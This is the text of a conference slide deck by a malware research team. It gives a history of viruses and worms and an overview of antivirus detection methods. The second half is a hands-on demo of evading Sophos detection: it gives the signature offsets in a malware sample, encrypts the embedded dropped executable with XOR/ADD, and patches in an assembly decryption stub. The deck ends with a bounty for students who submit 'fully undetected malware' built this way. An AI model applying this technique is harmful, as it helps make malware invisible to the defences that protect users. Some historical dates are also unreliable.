AntiVirus HAX! Presented by Ehab Hussein Synapse Malware research team : Sofiane Talmat (Algeria) Ehab Hussein (Egypt) SaadTalaat (Egypt) Amr Thabet (Egypt)
http://www.synapse-labs.com [email protected] Synapse Intro History AV Detection Techniques Bypassing Sophos :) Demo Student Bounty Challenge $$$
http://www.synapse-labs.com [email protected] Security Corporate Services Services
Solution Development Trainings
http://www.synapse-labs.com [email protected] Viruses don't harm, ignorance does!
« The Evolution of malware within the last ten years is described by the evolution of people who develop that » (Eugene kaspersky) http://www.synapse-labs.com [email protected] http://www.synapse-labs.com [email protected] – 1948 – 1966 (First theroical Approach) John von Neumann « Theory of self-reproducing automata »
http://www.synapse-labs.com [email protected] – 1971 (First Worm) Robert (Bob) H. Thomas (BBN technologies) "I'm the creeper, catch me if you can!" Machine : PDP-10 System : TENEX Transport : ARPANET was the world's first operational packet switching network and the core network of a set that came to compose the global Internet. Funded by Darpa
http://www.synapse-labs.com [email protected] WORM
http://www.synapse-labs.com [email protected] TROJAN HORSE
http://www.synapse-labs.com [email protected] – 1974/1975 (First Trojan Virus) John Walker « ANIMAL »
UNIVAC 1108
http://www.synapse-labs.com [email protected] – 1982/1982 (First microcomputer Virus) Rich Skrenta « Elk Cloner » Apple II Boot Sector
http://www.synapse-labs.com [email protected] BOOT SECTOR
http://www.synapse-labs.com [email protected] – 1986 (First IBM-PC Virus) Basit & Amjad Farooq Alvi « Brain Boot Sector » « Pakistan Flu » « Lahore »
http://www.synapse-labs.com [email protected] – 1986 (First File Infector Virus) VirDem Ver.: 1.06 (Generation #) aktive. Ralf Burger Copyright by R.Burger « Virdem model» 1986,1987 .com Phone.: D - 05932/5451
This is a demoprogram for computerviruses. Please put in a number now. If you're right, you'll be able to continue. The number is between 0 and x http://www.synapse-labs.com [email protected] COM INFECTION
http://www.synapse-labs.com [email protected] 1987 (Destructive Virus) Vienna / Lehigh / Yale / Stoned / Ping Pong
Cascade (self-encrypting file virus) IBM Antivirus
http://www.synapse-labs.com [email protected] 1987 Jerusalem « Infecting .EXE » Interrupt 1808(EXE) Friday 13th 1813(COM) ArabStar BlackBox BlackWindow Friday13th HebrewUniversity Israeli PLO Russian
http://www.synapse-labs.com [email protected] EXE Infection
http://www.synapse-labs.com [email protected] 1988 (First Internet Worm) Robert Tappan Morris « The Morris worm » Buffer Overflow 6000 infections
http://www.synapse-labs.com [email protected] BUFFER OVERFLOW
http://www.synapse-labs.com [email protected] 1988 (First Multipartite Virus) Ghostball EXE/COM/Boot Sector
http://www.synapse-labs.com [email protected] Multipartite virus A multipartite virus is a computer virus that infects and spreads in multiple ways. The term was coined to describe the first viruses that included DOS executable files and PC BIOS boot sector virus code, where both parts are viral themselves. For a complete cleanup, all parts of the virus must be removed.
http://www.synapse-labs.com [email protected] 1988 (First Polymorphic Virus) Mark Washburn & Ralf Burger « the Chameleon family » « Vienna and Cascade » 1260
http://www.synapse-labs.com [email protected] Polymorphism
http://www.synapse-labs.com [email protected] 1995 (First Macro Virus) « Concept »
Sub MAIN REM That's enough to prove my point End Sub
http://www.synapse-labs.com [email protected] Macro Virus Macro is a language built into a software application such as a word processor. Since some applications (notably, but not exclusively, the parts of Microsoft Office) allow macro programs to be embedded in documents, so that the programs may be run automatically when the document is opened
http://www.synapse-labs.com [email protected] 1998 Chen Ing Hau CIH v1 « Chernobyl / Spacefiller »
overwriting critical information on infected system drives, and more importantly, in some cases corrupting the system BIOS.
http://www.synapse-labs.com [email protected] 1999 (Year of the worms)
Jan 20: Happy99 worm (emails) (Spanska) March 26: Melissa worm (Microsoft Word/ Outlook) June 06: ExploreZip worm(Microsoft Office documents) December 30: Kak worm (Javascript worm / Outlook Express bug)
http://www.synapse-labs.com [email protected] 2000 (The most damaging worm ever) « ILOVEYOU worm (VBS/Loveletter) » VBScript
http://www.synapse-labs.com [email protected] 2000 (The year of Exploits)
Mai : Sadmind worm (Sun Solaris / Microsoft IIS) Juillet : Code Red worm (Microsoft IIS indexing) Septembre : Nimda worm (Windows/Code Red / Sadmind) Octobre : Klez worm (MS IE / MS Outlook / Outlook Express)
http://www.synapse-labs.com [email protected] 2002 (Metamorphic virus) Mental Driller « Win32/Simile » (Etap / MetaPHOR) 90% metamorphose May 14 / System locale
http://www.synapse-labs.com [email protected] METAMORPHIC VIRUS
metamorphic code is code that can reprogram itself. Often, it does this by translating its own code into a temporary representation, editing the temporary representation of itself, and then writing itself back to normal code again. This procedure is done with the virus itself, and thus also the metamorphic engine itself undergoes changes. This is used by some viruses when they are about to infect new files, and the result is that the "children" will never look like their "parents".
http://www.synapse-labs.com [email protected] 2002/2003 (Rise of the RAT & Trojans) a RAT, or remote access trojan (sometimes remote administration tool) is a program that listens for and accepts connections from a remote 3rd party and carries out the commands that 3rd party gives it...
Beast (Delphi) Optix Pro Graybird ProRat
http://www.synapse-labs.com [email protected] 2004 (First Webworm) « Santy »
- Target : phpbb forums - 40 000 sites infections
http://www.synapse-labs.com [email protected] 2006 (First ever Mac OS X virus) « OSX/Leap-A or OSX/Oompa-A »
Lan worm Bonjour Protocol (iChat buddy list)
http://www.synapse-labs.com [email protected] 2007 « ZEUS » (drive-by downloads /phishing)
June 2009 : 74,000 FTP 3.6 million infections in USA 28 Oct.2009 : 1.5 million messages phishing on facebook 14/15 Nov. 2009 : 9 million emails infected(Verizon Wireless) Credits cards of 15 banks compromised 1 Oct.2010 : FBI / 70 millions $ and 90 arrests May.2011 : source code release http://www.synapse-labs.com [email protected] 2007 (Mise a pirx : 250 000 $) « Conflicker »
NetBIOS Exploits MS08-067
http://www.synapse-labs.com [email protected] BOTNET
http://www.synapse-labs.com [email protected] Cyber Weapons !!!!! 2010 : STUXNET Destructive (targets industrial systems)
2011 : Duqu NON Destructive (targets industrial systems to gather information that could be useful in attacking)
http://www.synapse-labs.com [email protected] AntiViruses
http://www.synapse-labs.com [email protected] Possibly the first publicly documented removal of a computer virus in the wild was performed
by Bernd Fix in 1987
Enough Said...
http://www.synapse-labs.com [email protected] Detections
http://www.synapse-labs.com [email protected] Signature Based Detection
http://www.synapse-labs.com [email protected] Behaviour Based Detection
http://www.synapse-labs.com [email protected] Normalization
http://www.synapse-labs.com [email protected] What About rootkits
Signature-Based File Integrity Monitoring (ex: Tripwire)
Hooking Detection Network-Based Detection
Heuristics-Based Detection
http://www.synapse-labs.com [email protected] Lets Bypass That AV #Demo
http://www.synapse-labs.com [email protected] 1- Locate the signature : in our case we have :
A- the signature turko 0x00003F87 0x00000005 0x00004343 0x00000005 0x000044EF 0x00000005 0x0002E754 0x00000005 0x0002E76C 0x00000005 0x0002E78F 0x00000005
http://www.synapse-labs.com [email protected] B- the Starting of the MZ file to be dropped the MZ signature starts from 37D64 : MZP
before the MZP there is another signature in unicode starting at 37D1A it starts the unicode string DENAME
http://www.synapse-labs.com [email protected] 2- Patching the signature :
A- the signature turko All what we can do is change some chars to capital letters (playing with case) for all the patterns found
B- we need to encrypt the signature starting from 37D1A (43F11A in debugger) from Hexworkshop we load the exe and we go to the address 37D1A (43F11A in debugger) we select from there till the end of the file (approx 0xBC6E bytes) we go to tools/operations and we make some encryption for example :
Add 20 Xor 27
http://www.synapse-labs.com [email protected] now back to debugger, we load the exe then we go to DATA section at address 43F11A : we select the following part : 0043F11A 44 00 45 00 4E 00 45 00 D.E.N.E. 0043F122 4D 00 45 00 06 00 44 00 M.E..D. 0043F12A 56 00 43 00 4C 00 41 00 V.C.L.A. 0043F132 4C 00 03 00 45 00 44 00 L..E.D. 0043F13A 54 00 0B 00 50 00 41 00 T..P.A. 0043F142 43 00 4B 00 41 00 47 00 C.K.A.G. 0043F14A 45 00 49 00 4E 00 46 00 E.I.N.F. 0043F152 4F 00 07 00 52 00 4F 00 O..R.O. 0043F15A 4F 00 54 00 4B 00 49 00 O.T.K.I. 0043F162 54 00 4D 5A 50 T.MZP we put a breakpoint on memory on access
We run the exe, the breakpoint will be hit at the following instruction :
7C9350C0 0FB706 MOVZX EAX,WORD PTR DS:[ESI] http://www.synapse-labs.com [email protected] we can see it's in NTDLL.DLL, we look into the stack and we search for the return address to our binary so we locate the original call addres we find the following in the stack :
0012FF00 |00403EC9 É>@. RETURN to unpacked.00403EC9 from
http://www.synapse-labs.com [email protected] we go to the address 00403EC9 and we find the following instruction :
00403EC4 |. E8 AFF8FFFF CALL
http://www.synapse-labs.com [email protected] we take the instruction that come before the return address
00403EC4 |. E8 AFF8FFFF CALL
we will take the that address and instruction and save them.
http://www.synapse-labs.com [email protected] Next step we go at the end of the exe lets say addres 004307A2 and we write our decryption function
004307A2 > 60 PUSHAD 004307A3 . 9C PUSHFD 004307A4 . BF 1AF14300 MOV EDI,Copy_of_.0043F11A 004307A9 . B9 E6BC0000 MOV ECX,0BCE6 004307AE > 8A1F MOV BL,BYTE PTR DS:[EDI] ; | 004307B0 . 80F3 27 XOR BL,27 ; | 004307B3 . 80EB 20 SUB BL,20 ; | 004307B6 . 881F MOV BYTE PTR DS:[EDI],BL ; | 004307B8 . 47 INC EDI ; | 004307B9 .^E2 F3 LOOPD SHORT Copy_of_.004307AE ; | 004307BB . 9D POPFD ; | 004307BC . 61 POPAD ; |
http://www.synapse-labs.com [email protected] Now we will change the instruction :
00403EC4 |. E8 AFF8FFFF CALL
00403EC4 . E9 D9C80200 JMP Copy_of_.004307A2 ; (JMP 004307A2) so we can jump to our decryption function
http://www.synapse-labs.com [email protected] add the overwritten function and a jmp back to our decryption function like following :
004307A2 > 60 PUSHAD 004307A3 . 9C PUSHFD 004307A4 . BF 1AF14300 MOV EDI,Copy_of_.0043F11A 004307A9 . B9 E6BC0000 MOV ECX,0BCE6 004307AE > 8A1F MOV BL,BYTE PTR DS:[EDI] ; | 004307B0 . 80F3 27 XOR BL,27 ; | 004307B3 . 80EB 20 SUB BL,20 ; | 004307B6 . 881F MOV BYTE PTR DS:[EDI],BL ; | 004307B8 . 47 INC EDI ; | 004307B9 .^E2 F3 LOOPD SHORT Copy_of_.004307AE ; | 004307BB . 9D POPFD ; | 004307BC . 61 POPAD ; | 004307BD . E8 B62FFDFF CALL
Last step is to mark our memory location at 0043F11A as Writeable so we can decrypt the data there and we do it with PE Explorer for example http://www.synapse-labs.com [email protected] Bounty challenge 50$ discount on any synapse course & Recognition on synapse-labs facebook To the student that will send us Fully undetected malware using Our same technique from the demo
http://www.synapse-labs.com [email protected] Thank you
Facebook.com/Synapse.Labs Twitter : @Synapse_Labs
My Twitter: @__Obzy__ My FaceBook: www.facebook.com/Obzysynapse
http://www.synapse-labs.com [email protected]